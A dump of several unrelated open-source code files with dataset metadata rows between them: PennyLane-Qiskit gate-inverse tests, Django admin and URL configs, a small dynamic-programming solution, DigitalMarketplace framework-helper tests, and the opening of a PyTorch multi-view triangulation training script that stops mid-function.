op(wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,expected_output",
[
("CSWAP", [-1, -1, 1]),
],
)
def test_supported_gate_inverse_three_wires_no_parameters(self, name, expected_output):
"""Tests the inverse of supported gates that act on three wires that are not parameterized"""
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=3, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.BasisState(np.array([1, 0, 1]), wires=[0, 1, 2])
op(wires=[0, 1, 2]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliZ(2))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
# This test is ran on the state |0> with one Z expvals
@pytest.mark.parametrize(
"name,par,expected_output",
[
("PhaseShift", [math.pi / 2], 1),
("PhaseShift", [-math.pi / 4], 1),
("RX", [math.pi / 2], 0),
("RX", [-math.pi / 4], 1 / math.sqrt(2)),
("RY", [math.pi / 2], 0),
("RY", [-math.pi / 4], 1 / math.sqrt(2)),
("RZ", [math.pi / 2], 1),
("RZ", [-math.pi / 4], 1),
(
"QubitUnitary",
[
np.array(
[
[1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), -1j / math.sqrt(2)],
]
)
],
0,
),
(
"QubitUnitary",
[
np.array(
[
[-1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), 1j / math.sqrt(2)],
]
)
],
0,
),
],
)
def test_supported_gate_inverse_single_wire_with_parameters(self, name, par, expected_output):
"""Test the inverse of single gates with parameters"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
# This test is ran against the state 1/2|00>+sqrt(3)/2|11> with two Z expvals
@pytest.mark.parametrize(
"name,par,expected_output",
[
("CRZ", [0], [-1 / 2, -1 / 2]),
("CRZ", [-math.pi], [-1 / 2, -1 / 2]),
("CRZ", [math.pi / 2], [-1 / 2, -1 / 2]),
(
"QubitUnitary",
[
np.array(
[
[1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, 1],
]
)
],
[-1 / 2, -1 / 2],
),
(
"QubitUnitary",
[
np.array(
[
[-1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, -1],
]
)
],
[-1 / 2, -1 / 2],
),
],
)
def test_supported_gate_inverse_two_wires_with_parameters(self, name, par, expected_output):
"""Tests the inverse of supported gates that act on two wires that are parameterized"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(*np.negative(par), wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("Rot", [math.pi / 2, 0, 0], 1),
("Rot", [0, math.pi / 2, 0], 0),
("Rot", [0, 0, math.pi / 2], 1),
("Rot", [math.pi / 2, -math.pi / 4, -math.pi / 4], 1 / math.sqrt(2)),
("Rot", [-math.pi / 4, math.pi / 2, math.pi / 4], 0),
("Rot", [-math.pi / 4, math.pi / 4, math.pi / 2], 1 / math.sqrt(2)),
],
)
def test_unsupported_gate_inverses(self, name, par, expected_output):
"""Test the inverse of single gates with parameters"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_s_gate_inverses(self, par):
"""Tests the inverse of the S gate"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -0.5 * 1j * cmath.exp(-1j * par) * (-1 + cmath.exp(2j * par))
@qml.qnode(dev)
def circuit():
qml.Hadamard(0)
qml.RZ(par, wires=[0])
qml.S(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_t_gate_inverses(self, par):
"""Tests the inverse of the T gate"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -math.sin(par) / math.sqrt(2)
@qml.qnode(dev)
def circuit():
qml.RX(par, wires=[0])
qml.T(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_sx_gate_inverses(self, par):
"""Tests the inverse of the SX gate"""
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = math.sin(par)
@qml.qnode(dev)
def circuit():
qml.RY(par, wires=[0])
qml.SX(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
| 33.306569 | 101 | 0.483783 | import pytest
import pennylane as qml
import math
import cmath
import numpy as np
tol = 1e-5
class TestInverses:
@pytest.mark.parametrize(
"name,expected_output",
[
("Identity", 1),
("PauliX", -1),
("PauliY", -1),
("PauliZ", 1),
("Hadamard", 0),
("S", 1),
("T", 1),
("SX", 0),
],
)
def test_supported_gate_inverse_single_wire_no_parameters(self, name, expected_output):
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
@qml.qnode(dev)
def circuit():
op(wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,expected_output",
[
("CNOT", [-1 / 2, 1]),
("SWAP", [-1 / 2, -1 / 2]),
("CZ", [-1 / 2, -1 / 2]),
],
)
def test_supported_gate_inverse_two_wires_no_parameters(self, name, expected_output):
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,expected_output",
[
("CSWAP", [-1, -1, 1]),
],
)
def test_supported_gate_inverse_three_wires_no_parameters(self, name, expected_output):
op = getattr(qml.ops, name)
dev = qml.device("qiskit.aer", method="statevector", wires=3, shots=None)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.BasisState(np.array([1, 0, 1]), wires=[0, 1, 2])
op(wires=[0, 1, 2]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliZ(2))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("PhaseShift", [math.pi / 2], 1),
("PhaseShift", [-math.pi / 4], 1),
("RX", [math.pi / 2], 0),
("RX", [-math.pi / 4], 1 / math.sqrt(2)),
("RY", [math.pi / 2], 0),
("RY", [-math.pi / 4], 1 / math.sqrt(2)),
("RZ", [math.pi / 2], 1),
("RZ", [-math.pi / 4], 1),
(
"QubitUnitary",
[
np.array(
[
[1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), -1j / math.sqrt(2)],
]
)
],
0,
),
(
"QubitUnitary",
[
np.array(
[
[-1j / math.sqrt(2), 1j / math.sqrt(2)],
[1j / math.sqrt(2), 1j / math.sqrt(2)],
]
)
],
0,
),
],
)
def test_supported_gate_inverse_single_wire_with_parameters(self, name, par, expected_output):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("CRZ", [0], [-1 / 2, -1 / 2]),
("CRZ", [-math.pi], [-1 / 2, -1 / 2]),
("CRZ", [math.pi / 2], [-1 / 2, -1 / 2]),
(
"QubitUnitary",
[
np.array(
[
[1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, 1],
]
)
],
[-1 / 2, -1 / 2],
),
(
"QubitUnitary",
[
np.array(
[
[-1, 0, 0, 0],
[0, 1 / math.sqrt(2), 1 / math.sqrt(2), 0],
[0, 1 / math.sqrt(2), -1 / math.sqrt(2), 0],
[0, 0, 0, -1],
]
)
],
[-1 / 2, -1 / 2],
),
],
)
def test_supported_gate_inverse_two_wires_with_parameters(self, name, par, expected_output):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
assert dev.supports_operation(name)
@qml.qnode(dev)
def circuit():
qml.QubitStateVector(np.array([1 / 2, 0, 0, math.sqrt(3) / 2]), wires=[0, 1])
op(*np.negative(par), wires=[0, 1]).inv()
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize(
"name,par,expected_output",
[
("Rot", [math.pi / 2, 0, 0], 1),
("Rot", [0, math.pi / 2, 0], 0),
("Rot", [0, 0, math.pi / 2], 1),
("Rot", [math.pi / 2, -math.pi / 4, -math.pi / 4], 1 / math.sqrt(2)),
("Rot", [-math.pi / 4, math.pi / 2, math.pi / 4], 0),
("Rot", [-math.pi / 4, math.pi / 4, math.pi / 2], 1 / math.sqrt(2)),
],
)
def test_unsupported_gate_inverses(self, name, par, expected_output):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
op = getattr(qml.ops, name)
@qml.qnode(dev)
def circuit():
op(*np.negative(par), wires=0).inv()
return qml.expval(qml.PauliZ(0))
assert np.isclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_s_gate_inverses(self, par):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -0.5 * 1j * cmath.exp(-1j * par) * (-1 + cmath.exp(2j * par))
@qml.qnode(dev)
def circuit():
qml.Hadamard(0)
qml.RZ(par, wires=[0])
qml.S(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_t_gate_inverses(self, par):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = -math.sin(par) / math.sqrt(2)
@qml.qnode(dev)
def circuit():
qml.RX(par, wires=[0])
qml.T(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
@pytest.mark.parametrize("par", [np.pi / i for i in range(1, 5)])
def test_sx_gate_inverses(self, par):
dev = qml.device("qiskit.aer", method="statevector", wires=2, shots=None)
expected_output = math.sin(par)
@qml.qnode(dev)
def circuit():
qml.RY(par, wires=[0])
qml.SX(wires=[0]).inv()
return qml.expval(qml.PauliX(0))
assert np.allclose(circuit(), expected_output, atol=tol, rtol=0)
| true | true |
1c3c83f5e994692e0b4ca45b088cf657453bd348 | 257 | py | Python | admin.py | klml/frieda | 52d4b393108e3ee34f6671689ee565c7876cf93c | [
"MIT"
] | null | null | null | admin.py | klml/frieda | 52d4b393108e3ee34f6671689ee565c7876cf93c | [
"MIT"
] | null | null | null | admin.py | klml/frieda | 52d4b393108e3ee34f6671689ee565c7876cf93c | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
admin.site.register(Organisation)
admin.site.register(Internship)
admin.site.register(SchoolYear)
admin.site.register(InternshipAssignment)
admin.site.register(School)
admin.site.register(Metacontent)
| 25.7 | 41 | 0.836576 | from django.contrib import admin
from .models import *
admin.site.register(Organisation)
admin.site.register(Internship)
admin.site.register(SchoolYear)
admin.site.register(InternshipAssignment)
admin.site.register(School)
admin.site.register(Metacontent)
| true | true |
1c3c84c2bcf237ec22e42098df98128eb44cf3ec | 771 | py | Python | api/urls.py | ebar0n/palermo-coin | 63dc14fce31fbeae50ec7ebf5ea97efbb1ec18fd | [
"MIT"
] | null | null | null | api/urls.py | ebar0n/palermo-coin | 63dc14fce31fbeae50ec7ebf5ea97efbb1ec18fd | [
"MIT"
] | 15 | 2019-05-13T23:40:06.000Z | 2022-03-11T23:39:57.000Z | api/urls.py | ebar0n/leviatan-backend | 63dc14fce31fbeae50ec7ebf5ea97efbb1ec18fd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import django
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.urls import path, re_path
urlapi = [
path('api/social/', include('social_django.urls')),
path('api/v1/', include('accounts.urls')),
]
urlpatterns = urlapi + [
path('admin/', admin.site.urls),
re_path('static/(.*)$', django.views.static.serve, {'document_root': settings.STATIC_ROOT}),
re_path('media/(.*)$', django.views.static.serve, {'document_root': settings.MEDIA_ROOT}),
]
if settings.DOCS:
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Leviatan API', patterns=urlapi)
urlpatterns += [
url(r'^$', schema_view)
]
| 32.125 | 96 | 0.693904 |
import django
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.urls import path, re_path
urlapi = [
path('api/social/', include('social_django.urls')),
path('api/v1/', include('accounts.urls')),
]
urlpatterns = urlapi + [
path('admin/', admin.site.urls),
re_path('static/(.*)$', django.views.static.serve, {'document_root': settings.STATIC_ROOT}),
re_path('media/(.*)$', django.views.static.serve, {'document_root': settings.MEDIA_ROOT}),
]
if settings.DOCS:
from rest_framework_swagger.views import get_swagger_view
schema_view = get_swagger_view(title='Leviatan API', patterns=urlapi)
urlpatterns += [
url(r'^$', schema_view)
]
| true | true |
1c3c84f01638ab8da76b3c0047c0ecaef5bd4cea | 514 | py | Python | src/dynamic_programming/boj_9095.py | joeyworld/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | 1 | 2019-02-11T09:18:14.000Z | 2019-02-11T09:18:14.000Z | src/dynamic_programming/boj_9095.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | src/dynamic_programming/boj_9095.py | gyukebox/algo | 03e733f8f0dafe8b5cfe85eb9f7d72f370a67c61 | [
"MIT"
] | null | null | null | previous_answers = [None] * 12
previous_answers[0] = 1
previous_answers[1] = 1
previous_answers[2] = 2
def solve(n):
for i in range(3, n + 1):
previous_answers[i] = previous_answers[i - 1] + \
previous_answers[i - 2] + previous_answers[i - 3]
if __name__ == '__main__':
input_case = int(input())
inputs = [int(input()) for _ in range(input_case)]
[solve(single_input) for single_input in inputs]
for single_input in inputs:
print(previous_answers[single_input])
| 27.052632 | 61 | 0.655642 | previous_answers = [None] * 12
previous_answers[0] = 1
previous_answers[1] = 1
previous_answers[2] = 2
def solve(n):
for i in range(3, n + 1):
previous_answers[i] = previous_answers[i - 1] + \
previous_answers[i - 2] + previous_answers[i - 3]
if __name__ == '__main__':
input_case = int(input())
inputs = [int(input()) for _ in range(input_case)]
[solve(single_input) for single_input in inputs]
for single_input in inputs:
print(previous_answers[single_input])
| true | true |
1c3c8538f6866ad436f11ca1f85faa77a06bcf75 | 3,293 | py | Python | tests/main/helpers/test_framework_helpers.py | uk-gov-mirror/alphagov.digitalmarketplace-buyer-frontend | ec3751b6d24842cc53febb20391ae340c0fea756 | [
"MIT"
] | 4 | 2017-10-12T16:15:01.000Z | 2020-11-28T03:41:15.000Z | tests/main/helpers/test_framework_helpers.py | uk-gov-mirror/alphagov.digitalmarketplace-buyer-frontend | ec3751b6d24842cc53febb20391ae340c0fea756 | [
"MIT"
] | 615 | 2015-02-27T15:45:43.000Z | 2021-07-01T10:09:55.000Z | tests/main/helpers/test_framework_helpers.py | uk-gov-mirror/alphagov.digitalmarketplace-buyer-frontend | ec3751b6d24842cc53febb20391ae340c0fea756 | [
"MIT"
] | 15 | 2015-06-30T14:35:20.000Z | 2021-04-10T18:06:36.000Z | import mock
import pytest
from dmapiclient import HTTPError
from dmtestutils.api_model_stubs import FrameworkStub
from app.main.helpers.framework_helpers import get_framework_or_500, get_latest_live_framework, get_lots_by_slug
from ...helpers import BaseApplicationTest, CustomAbortException
class TestBuildSearchQueryHelpers(BaseApplicationTest):
def setup_method(self, method):
super().setup_method(method)
self.available_frameworks = self._get_frameworks_list_fixture_data().get('frameworks')
def test_get_latest_live_framework(self):
latest_framework_when_fixture_updated = 'g-cloud-9' # fixture set in base class
latest_live_framework = get_latest_live_framework(self.available_frameworks, 'g-cloud')
assert latest_live_framework['slug'] == latest_framework_when_fixture_updated
def test_get_lots_by_slug(self):
g_cloud_9_data = next((f for f in self.available_frameworks if f['slug'] == 'g-cloud-9'))
lots_by_slug = get_lots_by_slug(g_cloud_9_data)
assert lots_by_slug['cloud-hosting'] == g_cloud_9_data['lots'][0]
assert lots_by_slug['cloud-software'] == g_cloud_9_data['lots'][1]
assert lots_by_slug['cloud-support'] == g_cloud_9_data['lots'][2]
class TestGetFrameworkOr500():
def test_returns_framework(self):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.return_value = FrameworkStub().single_result_response()
assert get_framework_or_500(data_api_client_mock, 'g-cloud-10')['slug'] == 'g-cloud-10'
@mock.patch('app.main.helpers.framework_helpers.abort')
def test_aborts_with_500_if_framework_not_found(self, abort):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'Framework not found')
abort.side_effect = CustomAbortException()
with pytest.raises(CustomAbortException):
get_framework_or_500(data_api_client_mock, 'g-cloud-7')
assert abort.call_args_list == [
mock.call(500, 'Framework not found: g-cloud-7')
]
def test_raises_original_error_if_not_404(self):
data_api_client_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=400), 'Original exception')
with pytest.raises(HTTPError) as original_exception:
get_framework_or_500(data_api_client_mock, 'g-cloud-7')
assert original_exception.value.message == 'Original exception'
assert original_exception.value.status_code == 400
@mock.patch('app.main.helpers.framework_helpers.abort')
def test_calls_logger_if_provided(self, abort):
data_api_client_mock = mock.Mock()
logger_mock = mock.Mock()
data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'An error from the API')
get_framework_or_500(data_api_client_mock, 'g-cloud-7', logger_mock)
assert logger_mock.error.call_args_list == [
mock.call(
'Framework not found. Error: {error}, framework_slug: {framework_slug}',
extra={'error': 'An error from the API (status: 404)', 'framework_slug': 'g-cloud-7'},
)
]
| 43.906667 | 119 | 0.722138 | import mock
import pytest
from dmapiclient import HTTPError
from dmtestutils.api_model_stubs import FrameworkStub
from app.main.helpers.framework_helpers import get_framework_or_500, get_latest_live_framework, get_lots_by_slug
from ...helpers import BaseApplicationTest, CustomAbortException
class TestBuildSearchQueryHelpers(BaseApplicationTest):
def setup_method(self, method):
super().setup_method(method)
self.available_frameworks = self._get_frameworks_list_fixture_data().get('frameworks')
def test_get_latest_live_framework(self):
latest_framework_when_fixture_updated = 'g-cloud-9'
latest_live_framework = get_latest_live_framework(self.available_frameworks, 'g-cloud')
assert latest_live_framework['slug'] == latest_framework_when_fixture_updated
def test_get_lots_by_slug(self):
g_cloud_9_data = next((f for f in self.available_frameworks if f['slug'] == 'g-cloud-9'))
lots_by_slug = get_lots_by_slug(g_cloud_9_data)
assert lots_by_slug['cloud-hosting'] == g_cloud_9_data['lots'][0]
assert lots_by_slug['cloud-software'] == g_cloud_9_data['lots'][1]
assert lots_by_slug['cloud-support'] == g_cloud_9_data['lots'][2]
class TestGetFrameworkOr500():
    """Tests for get_framework_or_500: it returns the framework on success,
    aborts with a 500 when the API reports a 404, and re-raises other errors."""

    def test_returns_framework(self):
        # API returns the framework -> helper passes it straight through.
        data_api_client_mock = mock.Mock()
        data_api_client_mock.get_framework.return_value = FrameworkStub().single_result_response()
        assert get_framework_or_500(data_api_client_mock, 'g-cloud-10')['slug'] == 'g-cloud-10'

    @mock.patch('app.main.helpers.framework_helpers.abort')
    def test_aborts_with_500_if_framework_not_found(self, abort):
        data_api_client_mock = mock.Mock()
        data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'Framework not found')
        # Make the patched abort raise so we can assert the helper stops there.
        abort.side_effect = CustomAbortException()
        with pytest.raises(CustomAbortException):
            get_framework_or_500(data_api_client_mock, 'g-cloud-7')
        assert abort.call_args_list == [
            mock.call(500, 'Framework not found: g-cloud-7')
        ]

    def test_raises_original_error_if_not_404(self):
        # Non-404 API errors must propagate to the caller unchanged.
        data_api_client_mock = mock.Mock()
        data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=400), 'Original exception')
        with pytest.raises(HTTPError) as original_exception:
            get_framework_or_500(data_api_client_mock, 'g-cloud-7')
        assert original_exception.value.message == 'Original exception'
        assert original_exception.value.status_code == 400

    @mock.patch('app.main.helpers.framework_helpers.abort')
    def test_calls_logger_if_provided(self, abort):
        # When an optional logger is supplied, the 404 path logs before aborting.
        data_api_client_mock = mock.Mock()
        logger_mock = mock.Mock()
        data_api_client_mock.get_framework.side_effect = HTTPError(mock.Mock(status_code=404), 'An error from the API')
        get_framework_or_500(data_api_client_mock, 'g-cloud-7', logger_mock)
        assert logger_mock.error.call_args_list == [
            mock.call(
                'Framework not found. Error: {error}, framework_slug: {framework_slug}',
                extra={'error': 'An error from the API (status: 404)', 'framework_slug': 'g-cloud-7'},
            )
        ]
| true | true |
1c3c86051e26cdba0af4cc1b6ba464e9e0254444 | 21,785 | py | Python | train.py | aki34/learnable-triangulation-pytorch | e2a37b30ff7f0cfff474841f8033d37a9dab9926 | [
"MIT"
] | 1 | 2021-02-01T09:07:10.000Z | 2021-02-01T09:07:10.000Z | train.py | sg47/learnable-triangulation-pytorch | 4ada88f871078c8d27ea92d422d16c7104818169 | [
"MIT"
] | null | null | null | train.py | sg47/learnable-triangulation-pytorch | 4ada88f871078c8d27ea92d422d16c7104818169 | [
"MIT"
] | 1 | 2020-03-18T01:25:00.000Z | 2020-03-18T01:25:00.000Z | import os
import shutil
import argparse
import time
import json
from datetime import datetime
from collections import defaultdict
from itertools import islice
import pickle
import copy
import numpy as np
import cv2
import torch
from torch import nn
from torch import autograd
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
from tensorboardX import SummaryWriter
from mvn.models.triangulation import RANSACTriangulationNet, AlgebraicTriangulationNet, VolumetricTriangulationNet
from mvn.models.loss import KeypointsMSELoss, KeypointsMSESmoothLoss, KeypointsMAELoss, KeypointsL2Loss, VolumetricCELoss
from mvn.utils import img, multiview, op, vis, misc, cfg
from mvn.datasets import human36m
from mvn.datasets import utils as dataset_utils
def parse_args():
    """Build the CLI parser and parse the training/evaluation arguments."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--config", type=str, required=True,
                        help="Path, where config file is stored")
    parser.add_argument('--eval', action='store_true',
                        help="If set, then only evaluation will be done")
    parser.add_argument('--eval_dataset', type=str, default='val',
                        help="Dataset split on which evaluate. Can be 'train' and 'val'")
    parser.add_argument("--local_rank", type=int,
                        help="Local rank of the process on the node")
    parser.add_argument("--seed", type=int, default=42,
                        help="Random seed for reproducibility")
    parser.add_argument("--logdir", type=str,
                        default="/Vol1/dbstore/datasets/k.iskakov/logs/multi-view-net-repr",
                        help="Path, where logs will be stored")
    return parser.parse_args()
def setup_human36m_dataloaders(config, is_train, distributed_train):
    """Build Human3.6M train/val dataloaders from the experiment config.

    Returns (train_dataloader, val_dataloader, train_sampler). The train
    pieces are None when ``is_train`` is False; ``train_sampler`` is a
    DistributedSampler only when ``distributed_train`` is True.
    """
    # BUGFIX: train_sampler was previously assigned only inside the
    # `if is_train:` branch but is always returned, raising NameError
    # when called with is_train=False. Initialize both to None.
    train_dataloader = None
    train_sampler = None
    if is_train:
        # train
        train_dataset = human36m.Human36MMultiViewDataset(
            h36m_root=config.dataset.train.h36m_root,
            pred_results_path=config.dataset.train.pred_results_path if hasattr(config.dataset.train, "pred_results_path") else None,
            train=True,
            test=False,
            image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
            labels_path=config.dataset.train.labels_path,
            with_damaged_actions=config.dataset.train.with_damaged_actions,
            scale_bbox=config.dataset.train.scale_bbox,
            kind=config.kind,
            undistort_images=config.dataset.train.undistort_images,
            ignore_cameras=config.dataset.train.ignore_cameras if hasattr(config.dataset.train, "ignore_cameras") else [],
            crop=config.dataset.train.crop if hasattr(config.dataset.train, "crop") else True,
        )
        # Shard the dataset across processes when training with DDP.
        train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if distributed_train else None
        train_dataloader = DataLoader(
            train_dataset,
            batch_size=config.opt.batch_size,
            shuffle=config.dataset.train.shuffle and (train_sampler is None),  # DataLoader forbids shuffle together with a sampler
            sampler=train_sampler,
            collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.train.randomize_n_views,
                                                     min_n_views=config.dataset.train.min_n_views,
                                                     max_n_views=config.dataset.train.max_n_views),
            num_workers=config.dataset.train.num_workers,
            worker_init_fn=dataset_utils.worker_init_fn,
            pin_memory=True
        )
    # val (always built, also used for evaluation during training)
    val_dataset = human36m.Human36MMultiViewDataset(
        h36m_root=config.dataset.val.h36m_root,
        pred_results_path=config.dataset.val.pred_results_path if hasattr(config.dataset.val, "pred_results_path") else None,
        train=False,
        test=True,
        image_shape=config.image_shape if hasattr(config, "image_shape") else (256, 256),
        labels_path=config.dataset.val.labels_path,
        with_damaged_actions=config.dataset.val.with_damaged_actions,
        retain_every_n_frames_in_test=config.dataset.val.retain_every_n_frames_in_test,
        scale_bbox=config.dataset.val.scale_bbox,
        kind=config.kind,
        undistort_images=config.dataset.val.undistort_images,
        ignore_cameras=config.dataset.val.ignore_cameras if hasattr(config.dataset.val, "ignore_cameras") else [],
        crop=config.dataset.val.crop if hasattr(config.dataset.val, "crop") else True,
    )
    val_dataloader = DataLoader(
        val_dataset,
        batch_size=config.opt.val_batch_size if hasattr(config.opt, "val_batch_size") else config.opt.batch_size,
        shuffle=config.dataset.val.shuffle,
        collate_fn=dataset_utils.make_collate_fn(randomize_n_views=config.dataset.val.randomize_n_views,
                                                 min_n_views=config.dataset.val.min_n_views,
                                                 max_n_views=config.dataset.val.max_n_views),
        num_workers=config.dataset.val.num_workers,
        worker_init_fn=dataset_utils.worker_init_fn,
        pin_memory=True
    )
    return train_dataloader, val_dataloader, train_sampler
def setup_dataloaders(config, is_train=True, distributed_train=False):
    """Dispatch dataloader construction based on the configured dataset kind."""
    dataset_kind = config.dataset.kind
    if dataset_kind != 'human36m':
        raise NotImplementedError("Unknown dataset: {}".format(dataset_kind))
    # Only Human3.6M is supported at the moment.
    return setup_human36m_dataloaders(config, is_train, distributed_train)
def setup_experiment(config, model_name, is_train=True):
    """Create the experiment directory, copy the config and open a tensorboard writer.

    Returns (experiment_dir, writer).
    NOTE(review): relies on the module-level ``args`` (logdir, config path)
    set in the ``__main__`` block.
    """
    prefix = "" if is_train else "eval_"
    if config.title:
        experiment_title = config.title + "_" + model_name
    else:
        experiment_title = model_name
    experiment_title = prefix + experiment_title
    # Timestamp makes every run's directory name unique.
    experiment_name = '{}@{}'.format(experiment_title, datetime.now().strftime("%d.%m.%Y-%H:%M:%S"))
    print("Experiment name: {}".format(experiment_name))
    experiment_dir = os.path.join(args.logdir, experiment_name)
    os.makedirs(experiment_dir, exist_ok=True)
    checkpoints_dir = os.path.join(experiment_dir, "checkpoints")
    os.makedirs(checkpoints_dir, exist_ok=True)
    # Keep a copy of the config used for this run next to its logs.
    shutil.copy(args.config, os.path.join(experiment_dir, "config.yaml"))
    # tensorboard
    writer = SummaryWriter(os.path.join(experiment_dir, "tb"))
    # dump config to tensorboard
    # BUGFIX: SummaryWriter.add_text(tag, text_string, global_step) -- the
    # original call passed the config dump as the tag and "config" as the
    # text, swapping the first two arguments.
    writer.add_text("config", misc.config_to_str(config), 0)
    return experiment_dir, writer
def one_epoch(model, criterion, opt, config, dataloader, device, epoch, n_iters_total=0, is_train=True, caption='', master=False, experiment_dir=None, writer=None):
    """Run one training or validation epoch and return the updated iteration counter.

    Side effects: optimizer steps when ``is_train``; tensorboard logging and
    visualizations on the master process; on validation, the master process
    also dumps per-epoch predictions (results.pkl) and metrics (metric.json)
    under ``experiment_dir/checkpoints/<epoch>``.
    """
    name = "train" if is_train else "val"
    model_type = config.model.name
    if is_train:
        model.train()
    else:
        model.eval()
    metric_dict = defaultdict(list)
    results = defaultdict(list)
    # used to turn on/off gradients
    grad_context = torch.autograd.enable_grad if is_train else torch.no_grad
    with grad_context():
        end = time.time()
        iterator = enumerate(dataloader)
        if is_train and config.opt.n_iters_per_epoch is not None:
